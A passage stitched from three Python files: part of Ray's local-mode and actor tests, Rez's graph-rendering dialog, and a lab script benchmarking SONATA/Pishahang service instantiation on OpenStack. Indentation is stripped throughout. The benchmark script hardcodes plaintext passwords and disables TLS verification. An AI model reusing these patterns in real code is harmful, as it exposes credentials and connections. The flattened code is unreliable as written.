wait_objects = [echo.remote(i, delay_ms=10) for i in range(10)]
self.threads = [
threading.Thread(
target=self.background_thread, args=(wait_objects, ))
for _ in range(20)
]
[thread.start() for thread in self.threads]
def join(self):
[thread.join() for thread in self.threads]
assert self.thread_results == ["ok"] * len(self.threads)
return "ok"
actor = MultithreadedActor.remote()
actor.spawn.remote()
    assert ray.get(actor.join.remote()) == "ok"
def test_local_mode(shutdown_only):
@ray.remote
def local_mode_f():
return np.array([0, 0])
@ray.remote
def local_mode_g(x):
x[0] = 1
return x
ray.init(local_mode=True)
@ray.remote
def f():
return np.ones([3, 4, 5])
xref = f.remote()
# Remote functions should return ObjectIDs.
assert isinstance(xref, ray.ObjectID)
assert np.alltrue(ray.get(xref) == np.ones([3, 4, 5]))
y = np.random.normal(size=[11, 12])
# Check that ray.get(ray.put) is the identity.
assert np.alltrue(y == ray.get(ray.put(y)))
    # Make sure objects are immutable; this example is why we need to copy
    # arguments before passing them into remote functions in local mode.
aref = local_mode_f.remote()
assert np.alltrue(ray.get(aref) == np.array([0, 0]))
bref = local_mode_g.remote(ray.get(aref))
# Make sure local_mode_g does not mutate aref.
assert np.alltrue(ray.get(aref) == np.array([0, 0]))
assert np.alltrue(ray.get(bref) == np.array([1, 0]))
# wait should return the first num_returns values passed in as the
# first list and the remaining values as the second list
num_returns = 5
object_ids = [ray.put(i) for i in range(20)]
ready, remaining = ray.wait(
object_ids, num_returns=num_returns, timeout=None)
assert ready == object_ids[:num_returns]
assert remaining == object_ids[num_returns:]
# Check that ray.put() and ray.internal.free() work in local mode.
v1 = np.ones(10)
v2 = np.zeros(10)
k1 = ray.put(v1)
assert np.alltrue(v1 == ray.get(k1))
k2 = ray.put(v2)
assert np.alltrue(v2 == ray.get(k2))
ray.internal.free([k1, k2])
with pytest.raises(Exception):
ray.get(k1)
with pytest.raises(Exception):
ray.get(k2)
# Should fail silently.
ray.internal.free([k1, k2])
# Test actors in LOCAL_MODE.
@ray.remote
class LocalModeTestClass:
def __init__(self, array):
self.array = array
def set_array(self, array):
self.array = array
def get_array(self):
return self.array
def modify_and_set_array(self, array):
array[0] = -1
self.array = array
@ray.method(num_return_vals=3)
def returns_multiple(self):
return 1, 2, 3
test_actor = LocalModeTestClass.remote(np.arange(10))
obj = test_actor.get_array.remote()
assert isinstance(obj, ray.ObjectID)
assert np.alltrue(ray.get(obj) == np.arange(10))
test_array = np.arange(10)
# Remote actor functions should not mutate arguments
test_actor.modify_and_set_array.remote(test_array)
assert np.alltrue(test_array == np.arange(10))
# Remote actor functions should keep state
test_array[0] = -1
assert np.alltrue(test_array == ray.get(test_actor.get_array.remote()))
# Check that actor handles work in local mode.
@ray.remote
def use_actor_handle(handle):
array = np.ones(10)
handle.set_array.remote(array)
assert np.alltrue(array == ray.get(handle.get_array.remote()))
ray.get(use_actor_handle.remote(test_actor))
# Check that exceptions are deferred until ray.get().
exception_str = "test_advanced remote task exception"
@ray.remote
def throws():
raise Exception(exception_str)
obj = throws.remote()
with pytest.raises(Exception, match=exception_str):
ray.get(obj)
# Check that multiple return values are handled properly.
@ray.remote(num_return_vals=3)
def returns_multiple():
return 1, 2, 3
obj1, obj2, obj3 = returns_multiple.remote()
assert ray.get(obj1) == 1
assert ray.get(obj2) == 2
assert ray.get(obj3) == 3
assert ray.get([obj1, obj2, obj3]) == [1, 2, 3]
obj1, obj2, obj3 = test_actor.returns_multiple.remote()
assert ray.get(obj1) == 1
assert ray.get(obj2) == 2
assert ray.get(obj3) == 3
assert ray.get([obj1, obj2, obj3]) == [1, 2, 3]
@ray.remote(num_return_vals=2)
def returns_multiple_throws():
raise Exception(exception_str)
obj1, obj2 = returns_multiple_throws.remote()
with pytest.raises(Exception, match=exception_str):
        ray.get(obj1)
with pytest.raises(Exception, match=exception_str):
ray.get(obj2)
# Check that Actors are not overwritten by remote calls from different
# classes.
@ray.remote
class RemoteActor1:
def __init__(self):
pass
def function1(self):
return 0
@ray.remote
class RemoteActor2:
def __init__(self):
pass
def function2(self):
return 1
actor1 = RemoteActor1.remote()
_ = RemoteActor2.remote()
assert ray.get(actor1.function1.remote()) == 0
# Test passing ObjectIDs.
@ray.remote
def direct_dep(input):
return input
@ray.remote
def indirect_dep(input):
return ray.get(direct_dep.remote(input[0]))
assert ray.get(indirect_dep.remote(["hello"])) == "hello"
def test_wait_makes_object_local(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(num_cpus=0)
cluster.add_node(num_cpus=2)
ray.init(address=cluster.address)
@ray.remote
class Foo:
def method(self):
return np.zeros(1024 * 1024)
a = Foo.remote()
# Test get makes the object local.
x_id = a.method.remote()
assert not ray.worker.global_worker.core_worker.object_exists(x_id)
ray.get(x_id)
assert ray.worker.global_worker.core_worker.object_exists(x_id)
# Test wait makes the object local.
x_id = a.method.remote()
assert not ray.worker.global_worker.core_worker.object_exists(x_id)
ok, _ = ray.wait([x_id])
assert len(ok) == 1
assert ray.worker.global_worker.core_worker.object_exists(x_id)
if __name__ == "__main__":
import pytest
sys.exit(pytest.main(["-v", __file__]))
|
WriteGraphDialog.py
|
# SPDX-License-Identifier: Apache-2.0
# Copyright Contributors to the Rez Project
from Qt import QtCore, QtWidgets, QtGui
from rezgui.util import create_pane
from rez.utils.graph_utils import save_graph, prune_graph
import tempfile
import threading
import os
import os.path
class Writer(QtCore.QObject):
graph_written = QtCore.Signal(str, str)
def __init__(self, graph_str, filepath, prune_to=None):
super(Writer, self).__init__()
self.graph_str = graph_str
self.filepath = filepath
self.prune_to = prune_to
self.process = None
def cancel(self):
if self.process:
self.process.terminate()
def write_graph(self):
if self.prune_to:
graph_str = prune_graph(self.graph_str, self.prune_to)
else:
graph_str = self.graph_str
error_msg = ''
try:
save_graph(graph_str, self.filepath)
except Exception as e:
error_msg = str(e)
self.graph_written.emit(self.filepath, error_msg)
class WriteGraphDialog(QtWidgets.QDialog):
def __init__(self, graph_str, filepath, parent=None, prune_to=None):
super(WriteGraphDialog, self).__init__(parent)
self.setWindowTitle("Rendering graph...")
self.writer = Writer(graph_str, filepath, prune_to)
self.thread = None
self._finished = False
self.success = False
self.busy_cursor = QtGui.QCursor(QtCore.Qt.WaitCursor)
self.bar = QtWidgets.QProgressBar()
self.bar.setRange(0, 0)
self.cancel_btn = QtWidgets.QPushButton("Cancel")
pane = create_pane([None, self.cancel_btn], True)
create_pane([self.bar, pane], False, parent_widget=self)
self.writer.graph_written.connect(self._graph_written)
self.cancel_btn.clicked.connect(self._cancel)
def sizeHint(self):
return QtCore.QSize(300, 100)
def write_graph(self):
QtWidgets.QApplication.setOverrideCursor(self.busy_cursor)
self.thread = threading.Thread(target=self.writer.write_graph)
self.thread.daemon = True
self.thread.start()
self.exec_()
self.thread.join()
return self.success
def reject(self):
if self._finished:
super(WriteGraphDialog, self).reject()
else:
self._cancel()
def closeEvent(self, event):
if self._finished:
event.accept()
else:
self._cancel()
event.ignore()
def _cancel(self):
self.bar.setMaximum(10)
self.bar.setValue(10)
self.cancel_btn.setText("Cancelling...")
self.cancel_btn.setEnabled(False)
self.writer.cancel()
def _graph_written(self, filepath, error_message):
self._finished = True
self.bar.setMaximum(10)
self.bar.setValue(10)
QtWidgets.QApplication.restoreOverrideCursor()
self.setWindowTitle("Rendered graph")
if error_message:
QtWidgets.QMessageBox.critical(self, "Failed rendering resolve graph",
error_message)
elif filepath:
self.success = True
self.close()
graph_file_lookup = {}
def view_graph(graph_str, parent=None, prune_to=None):
"""View a graph."""
from rezgui.dialogs.ImageViewerDialog import ImageViewerDialog
from rez.config import config
# check for already written tempfile
h = hash((graph_str, prune_to))
filepath = graph_file_lookup.get(h)
if filepath and not os.path.exists(filepath):
filepath = None
# write graph to tempfile
if filepath is None:
suffix = ".%s" % config.dot_image_format
fd, filepath = tempfile.mkstemp(suffix=suffix, prefix="rez-graph-")
os.close(fd)
dlg = WriteGraphDialog(graph_str, filepath, parent, prune_to=prune_to)
if not dlg.write_graph():
return
# display graph
graph_file_lookup[h] = filepath
dlg = ImageViewerDialog(filepath, parent)
dlg.exec_()
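# A minimal usage sketch (illustrative only; not called from this module). It
# assumes a running QApplication, a dot-format resolve graph string obtained
# elsewhere, and a destination path chosen by the user. WriteGraphDialog
# renders the graph in a background thread and blocks with a progress bar
# until the file is written or the user cancels.
def _example_write_graph_to_file(graph_str, filepath, parent=None):
    dlg = WriteGraphDialog(graph_str, filepath, parent)
    return dlg.write_graph()  # True only if the graph was written successfully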
|
run-emu-experiment-sonata copy.py
|
# import wrappers
# make a method which does the following, taking the MANO client as a parameter (see the sketch after the imports below):
# get start time
# sleep 5 min
# get NS instantiation time
# send instantiation request to osm/sonata
from wrappers import SONATAClient
import time
import json
import requests
from urllib.request import urlopen
import csv
import os
import docker
from dateutil import parser
import threading
from keystoneauth1.identity import v3
from keystoneauth1 import session
from heatclient import client as hclient
from novaclient import client as nvclient
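# A minimal sketch of the experiment wrapper outlined in the comments at the
# top of this file. It is illustrative only and is not called by this script:
# `send_instantiation_request` is a hypothetical callable standing in for the
# SONATA/OSM client calls performed further below, and `idle_seconds` is the
# "sleep 5 min" idle period from the plan.
def run_single_experiment(mano_client, send_instantiation_request, idle_seconds=300):
    start_time = int(time.time())            # experiment start time
    time.sleep(idle_seconds)                 # idle period before instantiation
    ns_inst_time = int(time.time())          # NS instantiation timestamp
    send_instantiation_request(mano_client)  # send request to OSM/SONATA
    return start_time, ns_inst_time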
docker_client = docker.DockerClient(base_url='unix://container/path/docker.sock')
DOCKER_EXCLUDE = []
IDLE_SLEEP = 1
# NS_TERMINATION_SLEEP = 20
# REQUESTS_PER_MINUTE = 15
INTER_EXPERIMENT_SLEEP = 60
NO_ACTIVITY_COUNT = 1
USERNAME = "pishahang"
PASSWORD = "1234"
HOST_URL = "thesismano4.cs.upb.de"
APP_SERVER_PORT = 5055
AUTH_URL = "http://131.234.29.169/identity/v3"
OS_USERNAME = "demo"
OS_PASSWORD = "1234"
EXPERIMENT_REFERENCE = "crazy-delay-10runs-2"
IMAGES = ["cirros"]
INSTANCES = [50]
CASES = [1]
RUNS = 3
# REQUESTS_PER_MINUTE = list(range(1000, 100000, 10000))
REQUESTS_PER_MINUTE = [3200]
IS_EXPERIMENT_VNF_INSTANCES_BASED = True
SKIP_EXPERIMENT_IF_ERRORS = True
cases_vnfs = {
1: 1,
2: 3,
3: 5
}
# 131.234.28.240:5000/del_requests
def remove_requests(host=HOST_URL, port=APP_SERVER_PORT) :
_base_path = 'http://{0}:{1}/del_requests'.format(host, port)
try:
r = requests.get(_base_path, verify=False)
print(r.text)
except Exception as e:
print("Scale debug could'nt be set")
def restart_pishahang(host=HOST_URL, port=APP_SERVER_PORT) :
_base_path = 'http://{0}:{1}/restart_pishahang'.format(host, port)
try:
r = requests.get(_base_path, verify=False)
print(r.text)
except Exception as e:
print("Restart Pishahang")
def sonata_cleanup():
print("Sonata NSD/VNFD Cleanup")
_token = json.loads(sonata_auth.auth(
username=USERNAME,
password=PASSWORD))
_token = json.loads(_token["data"])
nsd_list = json.loads(sonata_nsd.get_ns_descriptors(
token=_token["token"]["access_token"], limit=1000))
nsd_list = json.loads(nsd_list["data"])
print(len(nsd_list))
for _nsd in nsd_list:
sonata_nsd.delete_ns_descriptors_nsdinfoid(
token=_token["token"]["access_token"],
nsdinfoid=_nsd["uuid"])
nsd_list = json.loads(sonata_nsd.get_ns_descriptors(
token=_token["token"]["access_token"]))
nsd_list = json.loads(nsd_list["data"])
# Delete VNFDs
vnf_list = json.loads(sonata_vnfpkgm.get_vnf_packages(
token=_token["token"]["access_token"], limit=1000))
vnf_list = json.loads(vnf_list["data"])
for _vnfd in vnf_list:
sonata_vnfpkgm.delete_vnf_packages_vnfpkgid(token=_token["token"]["access_token"], vnfPkgId=_vnfd["uuid"])
vnf_list = json.loads(sonata_vnfpkgm.get_vnf_packages(
token=_token["token"]["access_token"]))
vnf_list = json.loads(vnf_list["data"])
time.sleep(5)
def delete_stacks():
time.sleep(60)
auth = v3.Password(auth_url=AUTH_URL,
username=OS_USERNAME,
password=OS_PASSWORD,
project_name='demo',
user_domain_id='default',
project_domain_id='default')
sess = session.Session(auth=auth)
heat = hclient.Client('1', session=sess)
for s in heat.stacks.list():
try:
s.delete()
except Exception as e:
print(e)
def get_count_stack(init_time):
auth = v3.Password(auth_url=AUTH_URL,
username=OS_USERNAME,
password=OS_PASSWORD,
project_name='demo',
user_domain_id='default',
project_domain_id='default')
sess = session.Session(auth=auth)
heat = hclient.Client('1', session=sess)
active_count = 0
build_count = 0
error_count = 0
for _s in heat.stacks.list():
server_created = parser.parse(_s.creation_time)
if int(server_created.strftime("%s")) > int(init_time) :
print(_s.stack_status)
if _s.stack_status == "UPDATE_COMPLETE":
active_count += 1
elif _s.stack_status in ["UPDATE_IN_PROGRESS", "CREATE_COMPLETE"]:
build_count += 1
elif _s.stack_status in ["CREATE_FAILED", "UPDATE_FAILED"]:
error_count += 1
return active_count, build_count, error_count
def get_count(init_time, requests_list):
active_count = 0
build_count = 0
error_count = 0
for _r in requests_list:
server_created = parser.parse(_r['began_at'])
if int(server_created.strftime("%s")) >= int(init_time):
print(_r['status'])
if _r['status'] == "READY":
active_count += 1
elif _r['status'] == "INSTANTIATING":
build_count += 1
elif _r['status'] == "ERROR":
error_count += 1
else:
print("Other Status")
print(_r['status'])
return active_count, build_count, error_count
def get_individual_times(individual_init_times, folder_path, init_time, _ns_list):
auth = v3.Password(auth_url=AUTH_URL,
username=OS_USERNAME,
password=OS_PASSWORD,
project_name='demo',
user_domain_id='default',
project_domain_id='default')
sess = session.Session(auth=auth)
heat = hclient.Client('1', session=sess)
_servers = heat.stacks.list()
print(individual_init_times)
    with open('{folder}/individual-build-times.csv'.format(folder=folder_path), 'w') as _file:
_file.write("id,mano_time,ns_mano_time,vim_time\n")
for _s in _servers:
if _s.status == "COMPLETE":
server_created = parser.parse(_s.creation_time)
launch_time = parser.parse(_s.updated_time)
if int(server_created.strftime("%s")) > int(init_time):
# ns_init_time = next((item for item in _ns_list if item["short-name"] == "{}-{}".format(_s.name.split("-")[0], _s.name.split("-")[1])), False)
# ns_init_time = next((item for item in _ns_list if item["short-name"] == "{}-{}".format(_s.name.split("-")[0], _s.name.split("-")[1])), False)
# if not ns_init_time:
# ns_init_time = 0
# else:
# ns_init_time = ns_init_time['crete-time']
# print(server_created.strftime("%s"), nsname, individual_init_times[int(_s.name.split("-")[1])])
_mano_time = float(server_created.strftime("%s")) - float(individual_init_times[0])
ns_mano_time = float(server_created.strftime("%s")) - float(individual_init_times[0])
# ns_mano_time = float(server_created.strftime("%s")) - float(ns_init_time)
_vim_time = float(launch_time.strftime("%s")) - float(server_created.strftime("%s"))
print("{},{},{},{}\n".format(_s.stack_name, _mano_time, ns_mano_time, _vim_time))
_file.write("{},{},{},{}\n".format(_s.stack_name, _mano_time, ns_mano_time, _vim_time))
else:
print("Not Complete")
return
# http://patorjk.com/software/taag/#p=display&h=1&v=1&f=ANSI%20Shadow&t=OSM%20%0AExperiment
print("""
██████╗ ██╗███████╗██╗ ██╗ █████╗ ██╗ ██╗ █████╗ ███╗ ██╗ ██████╗
██╔══██╗██║██╔════╝██║ ██║██╔══██╗██║ ██║██╔══██╗████╗ ██║██╔════╝
██████╔╝██║███████╗███████║███████║███████║███████║██╔██╗ ██║██║ ███╗
██╔═══╝ ██║╚════██║██╔══██║██╔══██║██╔══██║██╔══██║██║╚██╗██║██║ ██║
██║ ██║███████║██║ ██║██║ ██║██║ ██║██║ ██║██║ ╚████║╚██████╔╝
╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═══╝ ╚═════╝
███████╗██╗ ██╗██████╗ ███████╗██████╗ ██╗███╗ ███╗███████╗███╗ ██╗████████╗
██╔════╝╚██╗██╔╝██╔══██╗██╔════╝██╔══██╗██║████╗ ████║██╔════╝████╗ ██║╚══██╔══╝
█████╗ ╚███╔╝ ██████╔╝█████╗ ██████╔╝██║██╔████╔██║█████╗ ██╔██╗ ██║ ██║
██╔══╝ ██╔██╗ ██╔═══╝ ██╔══╝ ██╔══██╗██║██║╚██╔╝██║██╔══╝ ██║╚██╗██║ ██║
███████╗██╔╝ ██╗██║ ███████╗██║ ██║██║██║ ╚═╝ ██║███████╗██║ ╚████║ ██║
╚══════╝╚═╝ ╚═╝╚═╝ ╚══════╝╚═╝ ╚═╝╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═══╝ ╚═╝
██████╗ ██╗ ██╗███╗ ██╗███╗ ██╗███████╗██████╗
██╔══██╗██║ ██║████╗ ██║████╗ ██║██╔════╝██╔══██╗
██████╔╝██║ ██║██╔██╗ ██║██╔██╗ ██║█████╗ ██████╔╝
██╔══██╗██║ ██║██║╚██╗██║██║╚██╗██║██╔══╝ ██╔══██╗
██║ ██║╚██████╔╝██║ ╚████║██║ ╚████║███████╗██║ ██║
╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝╚═╝ ╚═══╝╚══════╝╚═╝ ╚═╝
""")
for _image in IMAGES:
for _case in CASES:
for _instances in INSTANCES:
for _rpm in REQUESTS_PER_MINUTE:
for _run in range(1, RUNS+1):
print("{image}_case{case}_{instances}_Run{run}".format(image=_image, case=_case, instances=_instances, run=_run))
# NO_INSTANCES = _instances
NSNAME = "{image}_case{case}-{_id}"
NSDESCRIPTION = "{image}_case{case}_{instances}_rpm{rpm}_Run{run}".format(image=_image, case=_case, instances=_instances, rpm=_rpm, run=_run)
NSD_PATH = "/app/SONATA/Descriptors/CASE{case}/{image}_case{case}_nsd_sonata.yml".format(image=_image, case=_case)
# VNFD_PATHS = ["/app/SONATA/Descriptors/CASE{case}/{image}_vnfd.1.yml".format(image=_image, case=_case), "/app/SONATA/Descriptors/CASE{case}/{image}_vnfd.2.yml".format(image=_image, case=_case), "/app/SONATA/Descriptors/CASE{case}/{image}_vnfd.3.yml".format(image=_image, case=_case), "/app/SONATA/Descriptors/CASE{case}/{image}_vnfd.4.yml".format(image=_image, case=_case), "/app/SONATA/Descriptors/CASE{case}/{image}_vnfd.5.yml".format(image=_image, case=_case)]
with open(NSD_PATH, 'r') as file:
nsd_data = file.read()
# with open(VNFD_PATH, 'r') as file:
# vnfd_data = file.read()
sonata_nsd = SONATAClient.Nsd(HOST_URL)
sonata_nslcm = SONATAClient.Nslcm(HOST_URL)
sonata_auth = SONATAClient.Auth(HOST_URL)
sonata_vnfpkgm = SONATAClient.VnfPkgm(HOST_URL)
experiment_timestamps = {}
sonata_cleanup()
_token = json.loads(sonata_auth.auth(
username=USERNAME,
password=PASSWORD))
_token = json.loads(_token["data"])
for _c in range(1, 6):
# for _vnfd in VNFD_PATHS:
VNFD_PATH = "/app/SONATA/Descriptors/CASE{case}/{image}_vnfd_{vnfid}.yml".format(image=_image, case=_case, vnfid=_c)
_res = sonata_vnfpkgm.post_vnf_packages(token=_token,
package_path=VNFD_PATH)
print(_res)
time.sleep(0.5)
if IS_EXPERIMENT_VNF_INSTANCES_BASED:
no_instantiate = int(_instances/cases_vnfs[_case])
else:
no_instantiate = _instances
print("Instantiating {0} NS instances".format(no_instantiate))
for i in range(0, no_instantiate):
with open("/tmp/" + NSNAME.format(_id=str(i), image=_image, case=_case) + "nsd.yml", "w") as _file:
_file.write(nsd_data.format(_id=i))
_res = sonata_nsd.post_ns_descriptors(token=_token,
package_path="/tmp/" + NSNAME.format(_id=str(i), image=_image, case=_case) + "nsd.yml")
# print(_res)
time.sleep(0.5)
print("PHASE 1 : Recording idle metrics...")
experiment_timestamps["start_time"] = int(time.time())
time.sleep(IDLE_SLEEP)
print("PHASE 2 : Starting Instantiation Sequence...")
experiment_timestamps["ns_inst_time"] = int(time.time())
_token = json.loads(sonata_auth.auth(username=USERNAME, password=PASSWORD))
_token = json.loads(_token["data"])
_nsd_list = json.loads(sonata_nsd.get_ns_descriptors(token=_token["token"]["access_token"], limit=1000))
_nsd_list = json.loads(_nsd_list["data"])
print(len(_nsd_list))
def createFolder(directory):
try:
if not os.path.exists(directory):
os.makedirs(directory)
except OSError:
                            print('Error creating directory: ' + directory)
nit = "./EXP_RESULTS/{0}/{1}/{2}-{3}".format(EXPERIMENT_REFERENCE, no_instantiate, str(experiment_timestamps["ns_inst_time"]), NSDESCRIPTION)
createFolder("{nit}/".format(nit=nit))
experiment_complete = False
experiment_missing = 0
def successRatioThread():
global experiment_complete
global experiment_missing
# TIME_OUT = 60*NS_TERMINATION_SLEEP
TIME_OUT = no_instantiate * 60
QUERY_FREQUENCY = 10
COUNTER = 0
with open('{nit}/success-ratio.csv'.format(nit=nit), 'w') as _file:
_file.write("Time,Total,Active,Build,Error\n")
if IS_EXPERIMENT_VNF_INSTANCES_BASED:
TOTAL_INSTANCES = _instances
else:
TOTAL_INSTANCES = int(cases_vnfs[_case]*_instances)
_sr_old = "0,0,0"
_no_change_count = -1
while(COUNTER < TIME_OUT):
try:
_requests = json.loads(sonata_nslcm.get_ns_instances_request_status(
token=_token["token"]["access_token"], limit=1000))
_requests = json.loads(_requests["data"])
ACTIVE_INSTANCES, BUILD_INSTANCES, ERROR_INSTANCES = get_count(experiment_timestamps["ns_inst_time"], _requests)
experiment_missing = TOTAL_INSTANCES - ACTIVE_INSTANCES
_successratio = "{time},{total},{active},{build},{error}\n".format(
time=(int(time.time())),
total=(max(0, TOTAL_INSTANCES)),
active=(max(0, ACTIVE_INSTANCES)),
build=(max(0, BUILD_INSTANCES)),
error=(max(0, ERROR_INSTANCES)))
_sr_now = "{active},{build},{error}".format(
active=(max(0, ACTIVE_INSTANCES)),
build=(max(0, BUILD_INSTANCES)),
error=(max(0, ERROR_INSTANCES)))
if _sr_old == _sr_now:
_no_change_count += 1
print("No activity increased: ", str(_no_change_count))
if _no_change_count > NO_ACTIVITY_COUNT:
print("ERROR: Stopping due to no activity")
break
else:
_no_change_count = 0
print(_successratio)
print("###")
_sr_old = _sr_now
_file.write(_successratio)
if (ACTIVE_INSTANCES + ERROR_INSTANCES) == TOTAL_INSTANCES:
if ACTIVE_INSTANCES == TOTAL_INSTANCES:
experiment_complete = True
experiment_timestamps["end_to_end_lifecycle_time"] = int(time.time())-int(experiment_timestamps["ns_inst_time"])
print("END-TO-END Time {enetime}".format( enetime=experiment_timestamps["end_to_end_lifecycle_time"]))
break
if SKIP_EXPERIMENT_IF_ERRORS:
if ERROR_INSTANCES > 0:
print("Skipping Experiment Due To Errors")
break
experiment_timestamps["end_to_end_lifecycle_time"] = int(time.time())-int(experiment_timestamps["ns_inst_time"])
except Exception as e:
print(e)
print("ERROR OpenStack")
time.sleep(QUERY_FREQUENCY)
COUNTER += QUERY_FREQUENCY
successThread = threading.Thread(target=successRatioThread)
successThread.start()
individual_init_times = {}
for i in range(0, no_instantiate):
_ns = None
for _n in _nsd_list:
if NSNAME.format(_id=str(i), image=_image, case=_case) == _n['nsd']['name']:
_ns = _n['uuid']
# print("UUID")
# print(_ns)
continue
if _ns:
response = json.loads(
sonata_nslcm.post_ns_instances_nsinstanceid_instantiate(
token=_token["token"]["access_token"], nsInstanceId=_ns))
# print("response")
# print(response)
individual_init_times[i] = time.time()
if response["error"]:
print("ERROR - no ns uuid")
else:
print("ERROR - no ns uuid")
#print(response)
# time.sleep(0.1) - 0.1 sleep not working with pishahang
time.sleep(60/_rpm)
# Helpers._delete_test_nsd("test_osm_cirros_2vnf_nsd")
experiment_timestamps["ns_inst_end_time"] = int(time.time())
print("PHASE 2 : Recording Metrics Post NS instantiation...")
successThread.join()
print("PHASE 3 : Starting Termination Sequence...")
experiment_timestamps["ns_term_start_time"] = int(time.time())
_token = json.loads(sonata_auth.auth(username=USERNAME, password=PASSWORD))
_token = json.loads(_token["data"])
_nsd_list = json.loads(sonata_nsd.get_ns_descriptors(
token=_token["token"]["access_token"], limit=1000))
_nsd_list = json.loads(_nsd_list["data"])
_ns_list = json.loads(sonata_nslcm.get_ns_instances(
token=_token["token"]["access_token"], limit=1000))
_ns_list = json.loads(_ns_list["data"])
# get_individual_times(individual_init_times, nit, experiment_timestamps["ns_inst_time"], _ns_list)
_ns = None
for _n in _nsd_list:
try:
if NSNAME.format(_id=str(i), image=_image, case=_case) == _n['nsd']['name']:
# TODO: Print status
for _n2 in _ns_list:
if _n['uuid'] == _n2['descriptor_reference']:
_ns = _n2['uuid']
response = json.loads(
sonata_nslcm.post_ns_instances_nsinstanceid_terminate(
token=_token["token"]["access_token"], nsInstanceId=_ns))
except Exception as e:
print(e)
experiment_timestamps["ns_term_end_time"] = int(time.time())
print("PHASE 3 : Recording Metrics Post NS ...")
time.sleep(IDLE_SLEEP)
experiment_timestamps["end_time"] = int(time.time())
print("\n ########### FINISHED ########### \n")
print("Experiment Start Time {0}".format(experiment_timestamps["start_time"]))
print("Instantiation Start Time {0}".format(experiment_timestamps["ns_inst_time"]))
print("Instantiation End Time {0}".format(experiment_timestamps["ns_inst_end_time"]))
print("Termination Start Time {0}".format(experiment_timestamps["ns_term_start_time"]))
print("Termination End Time {0}".format(experiment_timestamps["ns_term_end_time"]))
print("Experiment End Time {0}".format(experiment_timestamps["end_time"]))
# TODO: Save all the data generated into csv file
# + Use before, after and fetch csv data from url as it is in the html file and write it to a file, named accordingly
# + Create a folder with the "ns_inst_time" as name
# 'http://osmmano.cs.upb.de:19999/api/v1/data?chart=system.cpu&format=csv&options=nonzero'
print("PHASE 4 : Saving Metrics ...")
_charts = {
"system-cpu" : {
"url": "http://{host}:19999/api/v1/data?chart=system.cpu&after={after}&before={before}&format=csv&options=nonzero".format(host=HOST_URL,after=experiment_timestamps["start_time"],before=experiment_timestamps["end_time"])
},
"system-load" : {
"url": "http://{host}:19999/api/v1/data?chart=system.load&after={after}&before={before}&format=csv&options=nonzero".format(host=HOST_URL, after=experiment_timestamps['start_time'], before=experiment_timestamps["end_time"])
},
"system-ram" : {
"url": "http://{host}:19999/api/v1/data?chart=system.ram&format=datasource&after={after}&before={before}&format=csv&options=nonzero".format(host=HOST_URL, after=experiment_timestamps['start_time'], before=experiment_timestamps["end_time"])
},
"system-net" : {
"url": "http://{host}:19999/api/v1/data?chart=system.net&format=datasource&after={after}&before={before}&format=csv&group=average>ime=0&datasource&options=nonzeroseconds".format(host=HOST_URL, after=experiment_timestamps["start_time"], before=experiment_timestamps["end_time"])
},
"system-io" : {
"url": "http://{host}:19999/api/v1/data?chart=system.io&format=datasource&after={after}&before={before}&format=csv&group=average>ime=0&datasource&options=nonzeroseconds".format(host=HOST_URL, after=experiment_timestamps["start_time"], before=experiment_timestamps["end_time"])
}
}
docker_list = {}
for _container in docker_client.containers.list():
if not _container.attrs["Name"][1:] in DOCKER_EXCLUDE:
_charts["{0}-{1}".format(_container.attrs["Name"][1:], "cpu")] = { "url" : "http://{host}:19999/api/v1/data?chart=cgroup_{_name}.cpu&format=csv&after={after}&before={before}&format=csv&group=average>ime=0&datasource&options=nonzeroseconds".format(host=HOST_URL, after=experiment_timestamps["start_time"], before=experiment_timestamps["end_time"], _name=_container.attrs["Name"][1:])}
_charts["{0}-{1}".format(_container.attrs["Name"][1:], "throttle_io")] = { "url" : "http://{host}:19999/api/v1/data?chart=cgroup_{_name}.throttle_io&format=csv&after={after}&before={before}&format=csv&group=average>ime=0&datasource&options=nonzeroseconds".format(host=HOST_URL, after=experiment_timestamps["start_time"], before=experiment_timestamps["end_time"], _name=_container.attrs["Name"][1:])}
_charts["{0}-{1}".format(_container.attrs["Name"][1:], "mem_usage")] = { "url" : "http://{host}:19999/api/v1/data?chart=cgroup_{_name}.mem_usage&format=csv&after={after}&before={before}&format=csv&group=average>ime=0&datasource&options=nonzeroseconds".format(host=HOST_URL, after=experiment_timestamps["start_time"], before=experiment_timestamps["end_time"], _name=_container.attrs["Name"][1:])}
for _sc, value in _charts.items():
print(_sc)
try:
# TODO: make verify=false as a fallback
r = requests.get(value["url"], verify=False)
if r.status_code == requests.codes.ok:
print("success")
with open('{nit}/{sc}.csv'.format(nit=nit,sc=_sc), 'w') as csv_file:
csv_file.write(r.text)
else:
print("Failed")
except Exception as e:
print(str(e))
with open('{nit}/experiment-meta.md'.format(nit=nit), 'w') as _file:
_file.write("Experiment Description {0}\n\n".format(NSDESCRIPTION))
_file.write("Experiment Start Time {0}\n".format(experiment_timestamps["start_time"]))
_file.write("Instantiation Start Time {0}\n".format(experiment_timestamps["ns_inst_time"]))
_file.write("Instantiation End Time {0}\n".format(experiment_timestamps["ns_inst_end_time"]))
_file.write("Termination Start Time {0}\n".format(experiment_timestamps["ns_term_start_time"]))
_file.write("Termination End Time {0}\n".format(experiment_timestamps["ns_term_end_time"]))
_file.write("Experiment End Time {0}\n".format(experiment_timestamps["end_time"]))
_file.write("\nhttp://{host}:9000/interactive?host={host}&after={after}&before={before}&start_time={start_time}&ns_inst_time={ns_inst_time}&ns_inst_end_time={ns_inst_end_time}&ns_term_start_time={ns_term_start_time}&ns_term_end_time={ns_term_end_time}&end_time={end_time}&exp_description={exp_description}".format(host=HOST_URL, after=experiment_timestamps["start_time"], before=experiment_timestamps["end_time"],start_time=experiment_timestamps["start_time"],ns_inst_time=experiment_timestamps["ns_inst_time"],ns_inst_end_time=experiment_timestamps["ns_inst_end_time"],ns_term_start_time=experiment_timestamps["ns_term_start_time"],ns_term_end_time=experiment_timestamps["ns_term_end_time"],end_time=experiment_timestamps["end_time"],exp_description=NSDESCRIPTION))
with open('{nit}/end-to-end-time.csv'.format(nit=nit), 'w') as _file:
_file.write("end-to-end-time\n{0}".format(experiment_timestamps["end_to_end_lifecycle_time"]))
print("Metrics saved in folder {nit}".format(nit=nit))
